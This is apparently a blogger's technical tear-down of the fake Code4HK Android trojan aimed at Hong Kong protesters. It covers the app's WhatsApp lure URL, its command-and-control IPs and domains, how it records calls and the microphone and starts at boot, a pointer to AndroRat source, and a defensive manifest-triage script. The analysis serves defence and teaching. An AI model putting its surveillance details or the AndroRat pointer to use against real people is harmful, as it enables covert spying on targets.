phone: + 852 – 2130-0120
fax-no: + 852 – 2133 2175
country: HK
changed: kmmwong@newworldtel.com 20080804
mnt-by: MAINT-HK-NEWWORLDTEL
source: APNIC

% Information related to '113.10.245.0/24AS17444'

route: 113.10.245.0/24
descr: NWT Route Object
origin: AS17444
mnt-by: MAINT-HK-NEWWORLDTEL
changed: kmmwong@newworldtel.com 20110114
source: APNIC

% This query was served by the APNIC Whois Service version 1.69.1-APNICv1r0 (WHOIS4)


Signing Off
D O & J Soo

[ Technical Tear Down: Fake Code4HK Mobile App ]

Today I’m going to talk about the fake Code4HK Android application which the news reported here: http://www.scmp.com/news/hong-kong/article/1594667/fake-occupy-central-app-targets-activists-smartphones. The Code4HK guys had already identified this Android malware (https://code4hk.hackpad.com/Fake-Code4HK-Mobile-App-HQXXrylI6Wi) long before the rest of the world did. I probably should stop writing about Android malware, but this one seems interesting enough for me to write about. 😛

As the incident happened almost 2 weeks ago and the international activists only saw it yesterday, I was lucky to be able to grab a sample of this off Matthew Rudy Jacobs’s GitHub. I’ll be doing my own technical tear-down of this malware and hope to cover it comprehensively.

[ Sample used in the analysis ]
MD5: 15e5143e1c843b4836d7b6d5424fb4a5
SHA1: c1e9ebd0b5ac7b6c50c69af219d163393d52df99

[ How it starts ]
It was first distributed via WhatsApp, as shown in the image below.
As we can see, it’s asking participants of #OccupyCentral to download this shortened link, http://is.gd/bh4adz
However, if you were to “Expand” this shortened URL, you will see that the final URL is http://code4hk.vicp.cc/code4hk.apk
That link is not valid anymore and, furthermore, that suspicious URL does not belong to Code4HK.
The official URL for Code4HK is http://www.code4.hk/

Since it’s Android malware, let’s check its permissions and dissect it further. Now, use apktool and run the following command:

Now let’s take a look at the AndroidManifest.xml file; you should see the following, including the permissions requested by the APK file.
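The manifest listings for both the Scoop sample and this fake Code4HK sample are not reproduced above, so here is an added Python example (not from the original post) of how to triage a manifest once apktool has decoded it to plain XML: it picks out the requested permissions that match the behaviours described on this page (SMS propagation, SMS/contact/call-log leakage, call and mic recording, start after reboot, location) and ties boot and outgoing-call receivers back to the class that handles them. The manifest embedded below is constructed for illustration and is not either sample’s real manifest; the receiver class names are borrowed from the analysis that follows.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: XML namespace

# Constructed manifest for illustration only; it is not the manifest of either APK on this page.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.sample">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <application android:label="Sample">
    <service android:name=".StreamService"/>
    <receiver android:name=".StreamReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <receiver android:name=".PhoneReceiver">
      <intent-filter><action android:name="android.intent.action.NEW_OUTGOING_CALL"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Permissions that map onto the behaviours described on this page.
WATCHLIST = {
    "android.permission.SEND_SMS": "send SMS: worm-style propagation to contacts",
    "android.permission.READ_SMS": "read SMS: message leakage",
    "android.permission.READ_CONTACTS": "read contacts: address-book leakage",
    "android.permission.READ_CALL_LOG": "read call log: call-history leakage",
    "android.permission.RECORD_AUDIO": "record audio: call / microphone recording",
    "android.permission.RECEIVE_BOOT_COMPLETED": "start at boot: persistence across reboot",
    "android.permission.ACCESS_FINE_LOCATION": "fine location: victim tracking",
}
# Broadcast actions worth tying back to the receiver class that handles them.
ACTIONS = {
    "android.intent.action.BOOT_COMPLETED": "runs at boot",
    "android.intent.action.NEW_OUTGOING_CALL": "sees every outgoing call",
    "android.provider.Telephony.SMS_RECEIVED": "sees every incoming SMS",
}


def requested_permissions(manifest_xml: str) -> list:
    root = ET.fromstring(manifest_xml)
    return [p.get(A + "name") for p in root.iter("uses-permission")]


def receivers_by_action(manifest_xml: str) -> dict:
    """Map each interesting broadcast action to the receiver classes registered for it."""
    root = ET.fromstring(manifest_xml)
    found = {}
    for recv in root.iter("receiver"):
        for action in recv.iter("action"):
            name = action.get(A + "name")
            if name in ACTIONS:
                found.setdefault(name, []).append(recv.get(A + "name"))
    return found


def triage(manifest_xml: str) -> dict:
    """Return only the permissions and receivers an analyst should look at first."""
    perms = requested_permissions(manifest_xml)
    return {
        "flagged": {p: WATCHLIST[p] for p in perms if p in WATCHLIST},
        "receivers": receivers_by_action(manifest_xml),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_MANIFEST)
    for perm, why in report["flagged"].items():
        print(f"{perm}: {why}")
    for action, classes in report["receivers"].items():
        print(f"{action} -> {', '.join(classes)} ({ACTIONS[action]})")
```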

There is interesting metadata available to us, like the following found in the cert.rsa file.

The email could be useful, but there are no hits on Google using it.
Another interesting but unconfirmed “finding” I have is that maerts spelled backwards is “stream”, so could ITSC mean CSTI? Council of Science and Technology Institute? I’m not sure, but I’ll let everyone’s imagination run. 😀

But let’s take a look at com.v1.MainActivity first, manually converting the initial Dalvik code back to pseudo-Java code.
After disassembling the .apk file with apktool and checking the Android manifest file, the first thing that I check is the MainActivity class.
We will get back something like what is shown below. Looking through the code, we can see that it starts another class, StreamService.

From my initial analysis, we can identify several things.
1.) It opens “qq.xml” from the Assets directory.
2.) It creates a new directory, “/sdcard/.qq/”.
3.) It reads the contents of “qq.xml” and creates a file, “/sdcard/.qq/temp.apk”.

If we analyse the Android manifest properly, “StreamService” will be started after reboot.
And if we analyse “StreamService” really carefully, it’s actually making use of AndroRat. 😛
If you have never seen AndroRat before, you can find a copy of it here: https://github.com/DesignativeDave/androrat
So basically, it’s getting lots of other stuff from the victims as well. o.0″

[ PhoneReceiver ]
Now let’s take a look at the “PhoneReceiver” class; we can see that it starts recording all outgoing calls made by the victim(s).
o.0″ Sounds malicious to me.

If we check the following Android documentation,
setOutputFormat – http://developer.android.com/reference/android/media/MediaRecorder.OutputFormat.html
setAudioSource – http://developer.android.com/reference/android/media/MediaRecorder.AudioSource.html
setAudioEncoder – http://developer.android.com/reference/android/media/MediaRecorder.AudioEncoder.html
we know that the output format is the 3GPP media file format, the recording source is the microphone, and the encoding used is the AMR (Narrowband) audio codec.

Other interesting findings include the naming convention of the filenames:
“out_” appended with the outgoing phone number followed by “_”, residing in “/data/data/com.v1/.record/”.
The file extension of the files is “.amr”, as shown below.

[ StreamReceiver ]
One interesting thing within the “StreamReceiver” class is that it tries to read “getAll.dat” in a try..catch block and, if it doesn’t find it, it activates the “features” of AndroRat.
It also tries to read the contents of config.dat under “/assets/config.dat”.
This file actually contains an IP address, “61.36.11.75”, and a number, “1430”, which we can safely assume is the port number.

It also tries to use Baidu to gather the victim’s location data, as shown below.
The API can be found here: http://developer.baidu.com/map/loc_refer/com/baidu/location/LocationClient.html

Besides the IP address highlighted earlier, there are other interesting IP addresses and domain names found within the “StreamReceiver” class, as shown below.
221.226.58.202
mm.v1lady.com:1430

One thing which most people may not know is that mm usually stands for “木马” (trojan horse) or “妹妹” (little sister) in the Chinese context.
I highly doubt it meant the latter. xDDD
“木马” means trojan horse. 😛

It also creates other interesting files storing all the information that it “steals” from the victim(s).
But I won’t go through each and every one of them.

From the whois information, we can gather more about v1lady.com, as shown below:

From the whois information, we can gather more about 221.226.58.202, as shown below:

[ FixTimeRecordReceiver ]
Now let’s take a look at the “FixTimeRecordReceiver” class; we can see that its purpose is to record audio using the mic.
While it looks almost the same as “PhoneReceiver”, the recording starts at a fixed interval, as set in “StreamService”.

Other interesting findings include the naming convention of the filenames:
“FIX_TIME_” appended with “yyyyMMddHHmmss” (the system date and time), residing in “/data/data/com.v1/.record/”.
The file extension of the files is “.amr”, as shown below.

[ Conclusion ]
While this is not a state-of-the-art Android Trojan, it’s probably one of the more interesting ones, as it makes use of a known coding group in Hong Kong and spreads through WhatsApp.
But there will always be questions: why are they being targeted, and why send it through WhatsApp? I think the number used could be one of those easily available “pre-paid” data SIM cards in Hong Kong.

I hope that this is a fairly simple-to-understand technical tear-down that people can repeat on their own to learn how to analyse Android malware.

Happy Reversing,
Jacob Soo